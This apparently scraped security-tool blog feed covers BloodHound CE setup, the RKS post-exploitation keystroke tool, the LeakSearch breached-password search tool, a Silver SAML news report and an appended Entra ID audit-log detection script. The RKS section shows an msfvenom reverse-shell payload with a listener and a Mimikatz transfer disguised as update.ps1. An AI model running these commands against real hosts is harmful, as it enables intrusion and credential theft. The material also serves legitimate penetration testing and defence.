The original BloodHound was created by <a href="https://www.twitter.com/_wald0" rel="nofollow" target="_blank" title="@_wald0">@_wald0</a>, <a href="https://twitter.com/CptJesus" rel="nofollow" target="_blank" title="@CptJesus">@CptJesus</a>, and <a href="https://twitter.com/harmj0y" rel="nofollow" target="_blank" title="@harmj0y">@harmj0y</a>.</p> <span><a name='more'></a></span><div><br/></div><span style="font-size: large;"><b>Running BloodHound Community Edition</b></span><br/> <p>The easiest way to get up and running is to use our pre-configured Docker Compose setup. The following steps will get BloodHound CE up and running with the least amount of effort.</p> <ol> <li>Install Docker Compose and ensure Docker is running. This should be included with the <a href="https://www.docker.com/products/docker-desktop/" rel="nofollow" target="_blank" title="Docker Desktop">Docker Desktop</a> installation</li> <li>Run <code>curl -L https://ghst.ly/getbhce | docker compose -f - up</code></li> <li>Locate the randomly generated password in the terminal output of Docker Compose</li> <li>In a browser, navigate to <code>http://localhost:8080/ui/login</code>. Log in with a username of <code>admin</code> and the randomly generated password from the logs</li> </ol> <p>NOTE: going forward, the default <code>docker-compose.yml</code> example binds only to localhost (127.0.0.1). If you want to access BloodHound outside of localhost, you'll need to follow the instructions in <a href="https://github.com/SpecterOps/examples/docker-compose/README.md" rel="nofollow" target="_blank" title="examples/docker-compose/README.md">examples/docker-compose/README.md</a> to configure the host binding for the container.</p> <br/><span style="font-size: large;"><b>Installation Error Handling</b></span><br/> <ul> <li>If you encounter a "failed to get console mode for stdin: The handle is invalid." error, ensure Docker Desktop (and the associated Engine) is running. 
Docker Desktop does not automatically register as a startup entry. </li> </ul> <p align="center"> <a href="https://blogger.googleusercontent.com/img/a/AVvXsEixBUvpG_6szaiuByEzz3zh7iCMbX8LXKZYHn9tniatuu1NfiBQBZUQ_udqiY1ePjGCsvfGgO-5xx5Y7bP_WfoQhbNhT0IaDRIMZzXiMDYjg-OqXsPasZVUL1reVZ8lshcNjP51LIw6MkyodfjUp9f7wh0w1j7_8Wf2zI_rX4BnaFmYdfTZeo61Ly_Ql7VP" rel="nofollow"><img alt="" border="0" id="BLOGGER_PHOTO_ID_7338668301600612402" src="https://blogger.googleusercontent.com/img/a/AVvXsEixBUvpG_6szaiuByEzz3zh7iCMbX8LXKZYHn9tniatuu1NfiBQBZUQ_udqiY1ePjGCsvfGgO-5xx5Y7bP_WfoQhbNhT0IaDRIMZzXiMDYjg-OqXsPasZVUL1reVZ8lshcNjP51LIw6MkyodfjUp9f7wh0w1j7_8Wf2zI_rX4BnaFmYdfTZeo61Ly_Ql7VP=s320"/></a> </p> <ul> <li>If you encounter an "Error response from daemon: Ports are not available: exposing port TCP 127.0.0.1:7474 -> 0.0.0.0:0: listen tcp 127.0.0.1:7474: bind: Only one usage of each socket address (protocol/network address/port) is normally permitted." this is normally attributed to the "Neo4J Graph Database - neo4j" service already running on your local system. 
Please stop or delete the service to continue.</li> </ul> <pre><code># Verify if Docker Engine is Running
docker info

# Attempt to stop Neo4j Service if running (on Windows)
Stop-Service "Neo4j" -ErrorAction SilentlyContinue</code></pre> <ul> <li>A successful installation of BloodHound CE looks like this:</li> </ul> <p>https://github.com/SpecterOps/BloodHound/assets/12970156/ea9dc042-1866-4ccb-9839-933140cc38b9</p> <br/><span style="font-size: large;"><b>Useful Links</b></span><br/> <ul> <li><a href="https://ghst.ly/BHSlack" rel="nofollow" target="_blank" title="BloodHound Slack">BloodHound Slack</a></li> <li><a href="https://github.com/SpecterOps/BloodHound/wiki" rel="nofollow" target="_blank" title="Wiki">Wiki</a></li> <li><a href="https://github.com/SpecterOps/CONTRIBUTORS.md" rel="nofollow" target="_blank" title="Contributors">Contributors</a></li> <li><a href="https://github.com/SpecterOps/examples/docker-compose/README.md" rel="nofollow" target="_blank" title="Docker Compose Example">Docker Compose Example</a></li> <li><a href="https://support.bloodhoundenterprise.io/" rel="nofollow" target="_blank" title="BloodHound Docs">BloodHound Docs</a></li> <li><a href="https://github.com/SpecterOps/BloodHound/wiki/Development" rel="nofollow" target="_blank" title="Developer Quick Start Guide">Developer Quick Start Guide</a></li> <li><a href="https://github.com/SpecterOps/BloodHound/wiki/Contributing" rel="nofollow" target="_blank" title="Contributing Guide">Contributing Guide</a></li> </ul> <br/><span style="font-size: large;"><b>Contact</b></span><br/> <p>Please check out the <a href="https://github.com/SpecterOps/BloodHound/wiki/Contact" rel="nofollow" target="_blank" title="Contact page">Contact page</a> in our wiki for details on how to reach out with questions and suggestions.</p><br/><br/><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/SpecterOps/BloodHound" rel="nofollow" 
target="_blank" title="Download BloodHound">Download BloodHound</a></span></b></div> </div><br/><b>Source:</b> <a href="http://www.kitploit.com/2024/03/bloodhound-six-degrees-of-domain-admin.html" rel="nofollow" target="_blank">www.kitploit.com</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4759513439688665544.post-81084193961189104472024-03-05T09:12:00.001-08:002024-03-05T09:12:05.771-08:00RKS - A Script To Automate Keystrokes Through A Graphical Desktop Program<div class="post-body entry-content" id="post-body-7130412277071592003" itemprop="articleBody"> <div style="margin:15px"> </div> <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0XDiXypTK-P_SJe6-IPlWn0NhMiHd3yskhfaVmlqOdirJRN54QZsmCsTXhRFK586TVOBTldBPZXoAsN5JKsnzvWalJT8meCNIRa8IlwhYjMR9HbicCtfYthEcraze2KNpzgDZMcCPeBuKcx-3WSXTQK2VMxHQtOKSp4O8sndz8hsFKH5lyXku-C5YePKU/s1271/RKS.png" imageanchor="1" rel="nofollow" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="691" data-original-width="1271" height="348" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0XDiXypTK-P_SJe6-IPlWn0NhMiHd3yskhfaVmlqOdirJRN54QZsmCsTXhRFK586TVOBTldBPZXoAsN5JKsnzvWalJT8meCNIRa8IlwhYjMR9HbicCtfYthEcraze2KNpzgDZMcCPeBuKcx-3WSXTQK2VMxHQtOKSp4O8sndz8hsFKH5lyXku-C5YePKU/w640-h348/RKS.png" width="640"/></a></div><p><br/></p> <p>A script to automate keystrokes through an active <a href="https://www.kitploit.com/search/label/Remote%20Desktop" rel="nofollow" target="_blank" title="remote desktop">remote desktop</a> session that assists offensive operators in combination with <a href="https://www.kitploit.com/search/label/Living%20Off%20The%20Land" rel="nofollow" target="_blank" title="living off the land">living off the land</a> techniques.</p> <br/><span style="font-size: large;"><b>About RKS (RemoteKeyStrokes)</b></span><br/> <p>All credit goes to <a href="https://github.com/nopernik" rel="nofollow" 
target="_blank" title="nopernik">nopernik</a> for making it possible so I took it upon myself to improve it. I wanted something that helps during the <a href="https://www.kitploit.com/search/label/Post%20Exploitation" rel="nofollow" target="_blank" title="post exploitation">post exploitation</a> phase when executing commands through a remote desktop.</p> <span><a name='more'></a></span><div><br/></div><span style="font-size: large;"><b>Help Menu</b></span><br/> <pre><code>$ ./rks.sh -h
Usage: ./rks.sh (RemoteKeyStrokes)

Options:
    -c, --command <command | cmdfile>    Specify a command or a file containing to execute
    -i, --input <input_file>             Specify the local input file to transfer
    -o, --output <output_file>           Specify the remote output file to transfer
    -m, --method <method>                Specify the file transfer or execution method
                                         (For file transfer "base64" is set by default if not specified.
                                          For execution method "none" is set by default if not specified)
    -p, --platform <operating_system>    Specify the operating system (windows is set by default if not specified)
    -w, --windowname <name>              Specify the window name for graphical remote program (freerdp is set by default if not specified)
    -h, --help                           Display this help message</code></pre> <br/><span style="font-size: large;"><b>Usage</b></span><br/> <br/><b>Internal Reconnaissance</b><br/> <ul> <li>When running in command prompt</li> </ul> <pre><code>$ cat recon_cmds.txt
whoami /all
net user
net localgroup Administrators
net user /domain
net group "Domain Admins" /domain
net group "Enterprise Admins" /domain
net group "Domain Computers" /domain

$ ./rks.sh -c recon_cmds.txt</code></pre> <br/><b>Execute Implant</b><br/> <ul> <li>Execute an implant while reading the contents of the payload in PowerShell.</li> </ul> <pre><code>$ msfvenom -p windows/x64/shell_reverse_tcp lhost=<IP> lport=4444 -f psh -o implant.ps1
$ ./rks.sh -c implant.ps1
$ nc -lvnp 4444</code></pre> <br/><b>File Transfer</b><br/> <ul> <li>Transfer a file remotely when pivoting in an isolated 
network. If you want to specify the remote path on Windows, be sure to include quotes.</li> </ul> <pre><code>$ ./rks.sh -i /usr/share/powersploit/Privesc/PowerUp.ps1 -o script.ps1
$ ./rks.sh -i /usr/share/powersploit/Exfiltration/Invoke-Mimikatz.ps1 -o "C:\Windows\Temp\update.ps1" -m base64</code></pre> <br/><b>Specify Graphical Remote Software</b><br/> <ul> <li>If the remote session uses VNC, specify the window name with <code>tightvnc</code>.</li> </ul> <p><code>$ ./rks.sh -i implant.ps1 -w tightvnc</code></p> <ul> <li>If you're targeting legacy operating systems with older RDP <a href="https://www.kitploit.com/search/label/Authentication" rel="nofollow" target="_blank" title="authentication">authentication</a>, specify the window name with <code>rdesktop</code>.</li> </ul> <p><code>$ ./rks.sh -i implant.bat -w rdesktop</code></p> <br/><span style="font-size: large;"><b>TODO and Help Wanted</b></span><br/> <ul> <li> <p>Add text colors for better user experience</p> </li> <li> <p>Implement Base64 file transfer</p> </li> <li> <p>Implement Bin2Hex file transfer</p> </li> <li> <p>Implement a persistence function for both Windows and Linux.</p> </li> <li> <p>Implement <a href="https://www.kitploit.com/search/label/Antiforensics" rel="nofollow" target="_blank" title="antiforensics">antiforensics</a> function for both Windows and Linux.</p> </li> <li> <p>Implement reading shellcode input and running a C# implant and PowerShell runspace</p> </li> <li> <p>Implement privesc function for both Windows and Linux</p> </li> </ul> <br/><span style="font-size: large;"><b>References</b></span><br/> <ul> <li> <p><a href="https://www.youtube.com/watch?v=8YFEujJUxws" rel="nofollow" target="_blank" title="Video: sethc.exe Backdoor CMD Payload delivery (USB Rubber Ducky style)">Video: sethc.exe Backdoor CMD Payload delivery (USB Rubber Ducky style)</a></p> </li> <li> <p><a href="https://github.com/nopernik/mytools/blob/master/rdp-cmd-delivery.sh" rel="nofollow" target="_blank" 
title="Original Script">Original Script</a></p> </li> <li> <p><a href="https://github.com/ztgrace/sticky_keys_hunter" rel="nofollow" target="_blank" title="sticky_keys_hunter">sticky_keys_hunter</a></p> </li> </ul> <br/><span style="font-size: large;"><b>Credits</b></span><br/> <ul> <li><a href="https://github.com/nopernik" rel="nofollow" target="_blank" title="nopernik">nopernik</a></li> </ul><br/><br/><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/U53RW4R3/RKS" rel="nofollow" target="_blank" title="Download RKS">Download RKS</a></span></b></div> </div><br/><b>Source:</b> <a href="http://www.kitploit.com/2024/03/rks-script-to-automate-keystrokes.html" rel="nofollow" target="_blank">www.kitploit.com</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4759513439688665544.post-82373026327858898802024-02-29T16:49:00.001-08:002024-02-29T16:49:17.670-08:00LeakSearch - Search & Parse Password Leaks<div class="post-body entry-content" id="post-body-5752100906801092914" itemprop="articleBody"> <div style="margin:15px"> </div> <p align="center"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgalFuqSTMVub-Sx0tu5NnujnSSIjVp_zOdv97hjJdympwu7RU0SdvZAKWOtUfhEGyN-PixHDck0O78q2udqUlqYIr5Vbo6vadwj0JG5GFRaxy9a4HltYVFKjXqrpWZwerTC7vKCkST6q_j1ag7BQOwyykSTvswSIVnKN0wG7j6mwhGhE6xK2z6FDijFZMP" rel="nofollow"><img alt="" border="0" height="404" id="BLOGGER_PHOTO_ID_7337931135416379826" src="https://blogger.googleusercontent.com/img/a/AVvXsEgalFuqSTMVub-Sx0tu5NnujnSSIjVp_zOdv97hjJdympwu7RU0SdvZAKWOtUfhEGyN-PixHDck0O78q2udqUlqYIr5Vbo6vadwj0JG5GFRaxy9a4HltYVFKjXqrpWZwerTC7vKCkST6q_j1ag7BQOwyykSTvswSIVnKN0wG7j6mwhGhE6xK2z6FDijFZMP=w640-h404" width="640"/></a></p> <br/> <p><strong>LeakSearch</strong> is a simple tool to search and parse plain text <a href="https://www.kitploit.com/search/label/Passwords" rel="nofollow" target="_blank" title="passwords">passwords</a> using ProxyNova COMB (Combination Of 
Many Breaches) over the Internet. You can define a custom proxy and also use your own password file, searching by different keywords such as user, domain or password. </p> <p>In addition, you can define how many results you want to display on the terminal and export them as <a href="https://www.kitploit.com/search/label/JSON" rel="nofollow" target="_blank" title="JSON">JSON</a> or TXT files. Due to the simplicity of the code, it is very easy to add new sources, so more providers will be added in the future.</p> <span><a name='more'></a></span><div><br/></div><span style="font-size: x-large;"><b>Requirements</b></span><br/> <ul> <li>Python 3 </li> <li>Install requirements</li> </ul> <br/><span style="font-size: x-large;"><b>Download</b></span><br/> <p>It is recommended to clone the complete repository or download the zip file. You can do this by running the following command:</p> <pre><code>git clone https://github.com/JoelGMSec/LeakSearch</code></pre> <br/><span style="font-size: x-large;"><b>Usage</b></span><br/> <pre><code> _               _     ____                      _     
| |    ___  __ _| | __/ ___|  ___  __ _ _ __ ___| |__  
| |   / _ \/ _` | |/ /\___ \ / _ \/ _` | '__/ __| '_ \ 
| |__|  __/ (_| |   <  ___) |  __/ (_| | | | (__| | | |
|_____\___|\__,_|_|\_\|____/ \___|\__,_|_|  \___|_| |_|

  ------------------- by @JoelGMSec -------------------

usage: LeakSearch.py [-h] [-d DATABASE] [-k KEYWORD] [-n NUMBER] [-o OUTPUT] [-p PROXY]

options:
  -h, --help            show this help message and exit
  -d DATABASE, --database DATABASE
                        Database used for the search (ProxyNova or LocalDataBase)
  -k KEYWORD, --keyword KEYWORD
                        Keyword (user/domain/pass) to search for leaks in the DB
  -n NUMBER, --number NUMBER
                        Number of results to show (default is 20)
  -o OUTPUT, --output OUTPUT
                        Save the results as json or txt into a file
  -p PROXY, --proxy PROXY
                        Set HTTP/S proxy (like http://localhost:8080)</code></pre> <br/><span style="font-size: large;"><b>The detailed guide of use can be found at the following link:</b></span><br/> 
<p>https://darkbyte.net/buscando-y-filtrando-contrasenas-con-leaksearch</p> <br/><span style="font-size: x-large;"><b>License</b></span><br/> <p>This project is licensed under the <a href="https://www.kitploit.com/search/label/GNU" rel="nofollow" target="_blank" title="GNU">GNU</a> 3.0 license - see the LICENSE file for more details.</p> <br/><span style="font-size: x-large;"><b>Credits and Acknowledgments</b></span><br/> <p>This tool has been created and designed from scratch by Joel Gámez Molina (@JoelGMSec).</p> <br/><span style="font-size: x-large;"><b>Contact</b></span><br/> <p>This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.</p> <p>For more information, you can find me on <a href="https://www.kitploit.com/search/label/Twitter" rel="nofollow" target="_blank" title="Twitter">Twitter</a> as <a href="https://twitter.com/JoelGMSec" rel="nofollow" target="_blank" title="@JoelGMSec">@JoelGMSec</a> and on my blog <a href="https://darkbyte.net" rel="nofollow" target="_blank" title="darkbyte.net">darkbyte.net</a>.</p> <br/><br/><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/JoelGMSec/LeakSearch" rel="nofollow" target="_blank" title="Download LeakSearch">Download LeakSearch</a></span></b></div> </div><br/><b>Source:</b> <a href="http://www.kitploit.com/2024/02/leaksearch-search-parse-password-leaks.html" rel="nofollow" target="_blank">www.kitploit.com</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4759513439688665544.post-40891109690046830192024-02-29T08:25:00.001-08:002024-02-29T08:25:22.212-08:00New Silver SAML Attack Evades Golden SAML Defenses In Identity Systems<div style="clear: right; float: right; position: relative; text-align: center;"><a 
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSZXHmAGVzbLiZO_GSByhDWl8Ku3OC23_yNsD0iN6C78bvKM0K_m3bjwPNOFZwmg0INvyYU5leMKUK1kYqeNkwPoiAI4YB16FeYlasLhtvD60m9gUecKLcnsKPh4678dqojbj6ZAH3xiU/s1600/h79.png" imageanchor="1" rel="nofollow"><img border="0" height="2" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSZXHmAGVzbLiZO_GSByhDWl8Ku3OC23_yNsD0iN6C78bvKM0K_m3bjwPNOFZwmg0INvyYU5leMKUK1kYqeNkwPoiAI4YB16FeYlasLhtvD60m9gUecKLcnsKPh4678dqojbj6ZAH3xiU/s1600/h79.png" width="2"/></a></div><div class="articlebody clear cf" id="articlebody"><div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3_6sv5NpzuZbAcWf78ZEfAMC5xtLD2_skoPU3hluY7oPp6fi0IqgZHMHUdLwQBE5d4E6Ib_tBfzikaR1lLkjjm7KScRsahF0S3BsjC-TI4lJ0VxdW6WSk_0PAg0dfBMz1vl1vyF5ZrShqZBmyEUdCCrmIMkJKBebQu3MibEkJzgGSrqdDCJgMGQyQGFDr/s728-rw-e365/ms.jpg" rel="nofollow" style="clear: left; display: block; float: left; text-align: center;"><img alt="Silver SAML Attack" border="0" data-original-height="380" data-original-width="728" data-src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3_6sv5NpzuZbAcWf78ZEfAMC5xtLD2_skoPU3hluY7oPp6fi0IqgZHMHUdLwQBE5d4E6Ib_tBfzikaR1lLkjjm7KScRsahF0S3BsjC-TI4lJ0VxdW6WSk_0PAg0dfBMz1vl1vyF5ZrShqZBmyEUdCCrmIMkJKBebQu3MibEkJzgGSrqdDCJgMGQyQGFDr/s728-rw-e365/ms.jpg" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=" title="Silver SAML Attack"/></a></div> <p>Cybersecurity researchers have disclosed a new attack technique called <strong>Silver SAML</strong> that can be successful even in cases where mitigations have been applied against Golden SAML attacks.</p><a name='more'></a> <p>Silver SAML "enables the exploitation of SAML to launch attacks from an identity provider like Entra ID against applications configured to use it for authentication, such as Salesforce," Semperis researchers Tomer Nahum and Eric Woodruff <a 
href="https://www.semperis.com/blog/meet-silver-saml" rel="nofollow" target="_blank">said</a> in a report shared with The Hacker News.</p> <p>Golden SAML (short for <a href="https://www.cloudflare.com/learning/access-management/what-is-saml/" rel="nofollow" target="_blank">Security Assertion Markup Language</a>) was <a href="https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps" rel="nofollow" target="_blank">first documented</a> by CyberArk in 2017. The attack vector, in a nutshell, entails the abuse of the interoperable authentication standard to impersonate almost any identity in an organization.</p> <p>It's also similar to the <a href="https://www.crowdstrike.com/cybersecurity-101/golden-ticket-attack/" rel="nofollow" target="_blank">Golden Ticket attack</a> in that it grants attackers the ability to gain unauthorized access to any service in a federation with any privileges and to stay persistent in this environment in a stealthy manner.</p> <div class="check_two clear bobbob"><center class="cf"><a href="https://thehackernews.uk/freedom728" rel="nofollow" target="_blank" title="Cybersecurity"><img alt="Cybersecurity" class="lazyload" data-src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUBKmQc1Mp9Be8o9pORH2koyv6AtOY3W6jgTh0TYLjlGfcGRPK3vlKwxQ88api-M6whsx6aLYlhAqdIZlbfG2-AnERTe5zlTwSYNSFOtzUf7t8PtnQ3tJ6wmv4QYZ1igZHb7b3AFkJEkQeNOASR7Q9JjzaivqAWpIbTFUCd6zuseItXCikh71SnSX50xXs/s728-rw-e365/freedom728.jpg" height="90" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=" width="727"/></a></center></div> <p>"Golden SAML introduces to a federation the advantages that golden ticket offers in a Kerberos environment – from gaining any type of access to stealthily maintaining persistency," security researcher Shaked Reiner noted at the time.</p> <p>Real-world attacks leveraging the method have been rare, 
the <a href="https://www.cyberark.com/resources/threat-research-blog/golden-saml-revisited-the-solorigate-connection" rel="nofollow" target="_blank">first</a> <a href="https://www.sygnia.co/threat-reports-and-advisories/golden-saml-attack/" rel="nofollow" target="_blank">recorded use</a> being the <a href="https://www.microsoft.com/en-us/security/blog/2020/12/28/using-microsoft-365-defender-to-coordinate-protection-against-solorigate/" rel="nofollow" target="_blank">compromise</a> of <a href="https://techcommunity.microsoft.com/t5/microsoft-sentinel-blog/solarwinds-post-compromise-hunting-with-azure-sentinel/ba-p/1995095" rel="nofollow" target="_blank">SolarWinds</a> <a href="https://msrc.microsoft.com/blog/2020/12/customer-guidance-on-recent-nation-state-cyber-attacks/" rel="nofollow" target="_blank">infrastructure</a> to gain administrative access by forging SAML tokens using compromised SAML token signing certificates.</p> <p>Golden SAML has also been weaponized by an Iranian threat actor codenamed <a href="https://thehackernews.com/2023/09/iranian-nation-state-actors-employ.html" rel="nofollow" target="_blank">Peach Sandstorm</a> in a March 2023 intrusion to access an unnamed target's cloud resources sans requiring any password, Microsoft revealed in September 2023.</p> <div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEw23CuuLPQhxppcT8caizSHnHXuvyUfmqOEmBt8FOcwPbAer1BktvE5JXhSxlp7_gqtdprHfil55s2igTA9pFElJ_lDMVvhioSTkczUb6u0jY-j_qx9UeWk7vlNG3nyu4Kb5Z8_2T8LeD7-JJ3fZfN2KrcODfWSzqIWj6yhD5zRhDqTMzg6S6WQTVIg4c/s728-rw-e365/http.jpg" rel="nofollow" style="clear: left; display: block; float: left; text-align: center;"><img alt="Silver SAML Attack" border="0" data-original-height="902" data-original-width="1536" 
data-src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEw23CuuLPQhxppcT8caizSHnHXuvyUfmqOEmBt8FOcwPbAer1BktvE5JXhSxlp7_gqtdprHfil55s2igTA9pFElJ_lDMVvhioSTkczUb6u0jY-j_qx9UeWk7vlNG3nyu4Kb5Z8_2T8LeD7-JJ3fZfN2KrcODfWSzqIWj6yhD5zRhDqTMzg6S6WQTVIg4c/s728-rw-e365/http.jpg" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=" title="Silver SAML Attack"/></a></div> <p>The latest approach is a spin on Golden SAML that works with an identity provider (IdP) like Microsoft Entra ID (formerly Azure Active Directory) and doesn't require access to the Active Directory Federation Services (<a href="https://learn.microsoft.com/en-us/windows-server/identity/ad-fs/ad-fs-overview" rel="nofollow" target="_blank">AD FS</a>). It has been assessed as a moderate-severity threat to organizations.</p> <p>"Within Entra ID, Microsoft provides a self-signed certificate for SAML response signing," the researchers said. "Alternatively, organizations can choose to use an externally generated certificate such as those from Okta. However, that option introduces a security risk."</p> <p>"Any attacker that obtains the private key of an externally generated certificate can forge any SAML response they want and sign that response with the same private key that Entra ID holds. 
With this type of forged SAML response, the attacker can then access the application — as any user."</p> <p>Following responsible disclosure to Microsoft on January 2, 2024, the company said the issue does not meet its bar for immediate servicing, but noted it will take appropriate action as needed to safeguard customers.</p> <div class="check_two clear bobbob"><center class="cf"><a href="https://thehackernews.uk/tcepdHrZ" rel="nofollow" target="_blank" title="Cybersecurity"><img alt="Cybersecurity" class="lazyload" data-src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVhi7qr5Hen_9AjDa2uZMIW8b9hxydG5MpgkcamW6lADBts-QzcbwiMscCUSJ5ScLmTIt97I9Y7L3kFbXLlkt40DwhkyCLl3QrLwjViEZrbgNuTHnIjYcFmf8OHFIdfXzIxCoCJYxj8rokzFuM9fAuUhoKus7KPsedxq4k7CY9_-iZ3dtVRdB1DtqvdRIf/s728-rw-e365/cis-728.png" height="90" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=" width="727"/></a></center></div> <p>While there is no evidence that Silver SAML has been exploited in the wild, organizations are required to use only Entra ID self-signed certificates for SAML signing purposes. Semperis has also made available a proof-of-concept (PoC) dubbed <a href="https://github.com/Semperis/SilverSamlForger" rel="nofollow" target="_blank">SilverSAMLForger</a> to create custom SAML responses.</p> <p>"Organizations can monitor Entra ID audit logs for changes to PreferredTokenSigningKeyThumbprint under ApplicationManagement," the researchers said.</p> <p>"You will need to correlate those events to Add service principal credential events that relate to the service principal. The rotation of expired certificates is a common process, so you will need to determine whether the audit events are legitimate. Implementing change control processes to document the rotation can help to minimize confusion during rotation events."</p> <br/> <div class="stophere" id="hiddenH1"></div> <div class="cf note-b">Found this article interesting? 
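<p>Semperis' monitoring advice above, turned into runnable detection logic over a constructed audit export: find every PreferredTokenSigningKeyThumbprint change recorded under ApplicationManagement and attach the latest credential-add event on the same service principal inside a look-back window, so an analyst sees which key swaps have a visible origin and which do not. This is an added example, not code from Semperis or The Hacker News; it assumes the Microsoft Graph directoryAudit field names used in the sample (category, activityDisplayName, initiatedBy, targetResources[].id and modifiedProperties[].displayName/oldValue/newValue), so verify them against your own tenant's exports.</p>

```python
import json
from datetime import datetime, timedelta, timezone

# Constructed audit export (no real tenant data). Field names follow the Microsoft
# Graph directoryAudit schema as I know it; check them against your own exports.
# sp-salesforce-0001 shows "credential added, then preferred signing key switched"
# two minutes apart; the key change on sp-hr-portal-0002 has no credential-add
# event inside the default 7-day look-back window.
SAMPLE_AUDIT_LOG = json.dumps([
    {"activityDateTime": "2024-01-05T08:00:00Z", "category": "ApplicationManagement",
     "activityDisplayName": "Add service principal credentials",
     "initiatedBy": {"user": {"userPrincipalName": "it-ops@example.com"}},
     "targetResources": [{"id": "sp-hr-portal-0002", "displayName": "HR Portal",
                          "type": "ServicePrincipal", "modifiedProperties": []}]},
    {"activityDateTime": "2024-02-20T09:12:03Z", "category": "ApplicationManagement",
     "activityDisplayName": "Add service principal credentials",
     "initiatedBy": {"user": {"userPrincipalName": "admin@example.com"}},
     "targetResources": [{"id": "sp-salesforce-0001", "displayName": "Salesforce",
                          "type": "ServicePrincipal", "modifiedProperties": []}]},
    {"activityDateTime": "2024-02-20T09:14:41Z", "category": "ApplicationManagement",
     "activityDisplayName": "Update service principal",
     "initiatedBy": {"user": {"userPrincipalName": "admin@example.com"}},
     "targetResources": [{"id": "sp-salesforce-0001", "displayName": "Salesforce",
                          "type": "ServicePrincipal", "modifiedProperties": [
                              {"displayName": "PreferredTokenSigningKeyThumbprint",
                               "oldValue": "\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"",
                               "newValue": "\"0123456789ABCDEF0123456789ABCDEF01234567\""}]}]},
    {"activityDateTime": "2024-02-21T17:30:00Z", "category": "ApplicationManagement",
     "activityDisplayName": "Update service principal",
     "initiatedBy": {"app": {"displayName": "Automation Runbook"}},
     "targetResources": [{"id": "sp-hr-portal-0002", "displayName": "HR Portal",
                          "type": "ServicePrincipal", "modifiedProperties": [
                              {"displayName": "PreferredTokenSigningKeyThumbprint",
                               "oldValue": "\"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB\"",
                               "newValue": "\"CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC\""}]}]},
])

def parse_events(raw_json):
    """Load an exported directoryAudit array and sort it by activity time."""
    events = json.loads(raw_json)
    for ev in events:
        ev["_time"] = datetime.strptime(
            ev["activityDateTime"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return sorted(events, key=lambda e: e["_time"])

def _unquote(value):
    """modifiedProperties values arrive JSON-encoded ('"abc"'); decode when possible."""
    try:
        return json.loads(value)
    except (TypeError, ValueError):
        return value

def _actor(ev):
    """Who initiated the event: a user UPN, else an application name."""
    who = ev.get("initiatedBy") or {}
    user, app = who.get("user") or {}, who.get("app") or {}
    return user.get("userPrincipalName") or app.get("displayName") or "unknown"

def signing_key_changes(events):
    """Yield (event, target, old, new) for each PreferredTokenSigningKeyThumbprint
    modification recorded under the ApplicationManagement category."""
    for ev in events:
        if ev.get("category") != "ApplicationManagement":
            continue
        for target in ev.get("targetResources", []):
            for prop in target.get("modifiedProperties", []):
                if prop.get("displayName") != "PreferredTokenSigningKeyThumbprint":
                    continue
                old, new = _unquote(prop.get("oldValue")), _unquote(prop.get("newValue"))
                if old != new:
                    yield ev, target, old, new

def correlate(events, lookback_days=7):
    """For every signing-key change, attach the latest credential-add event on the
    same service principal within the look-back window. None there means the new
    key has no visible origin in the window and deserves analyst attention first."""
    lookback = timedelta(days=lookback_days)
    findings = []
    for change, target, old, new in signing_key_changes(events):
        sp_id = target.get("id")
        adds = [e for e in events
                if e.get("activityDisplayName") == "Add service principal credentials"
                and any(t.get("id") == sp_id for t in e.get("targetResources", []))
                and change["_time"] - lookback <= e["_time"] <= change["_time"]]
        add = adds[-1] if adds else None
        findings.append({
            "service_principal": sp_id, "display_name": target.get("displayName"),
            "changed_at": change["activityDateTime"], "changed_by": _actor(change),
            "old_thumbprint": old, "new_thumbprint": new,
            "credential_added_at": add["activityDateTime"] if add else None,
            "credential_added_by": _actor(add) if add else None,
        })
    return findings

if __name__ == "__main__":
    for finding in correlate(parse_events(SAMPLE_AUDIT_LOG)):
        print(json.dumps(finding, indent=2))
```

<p>Rotation of an expiring certificate also produces both events, so the output is a triage list rather than an alert; a change-control ticket covering the credential-add event is what separates the two.</p>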
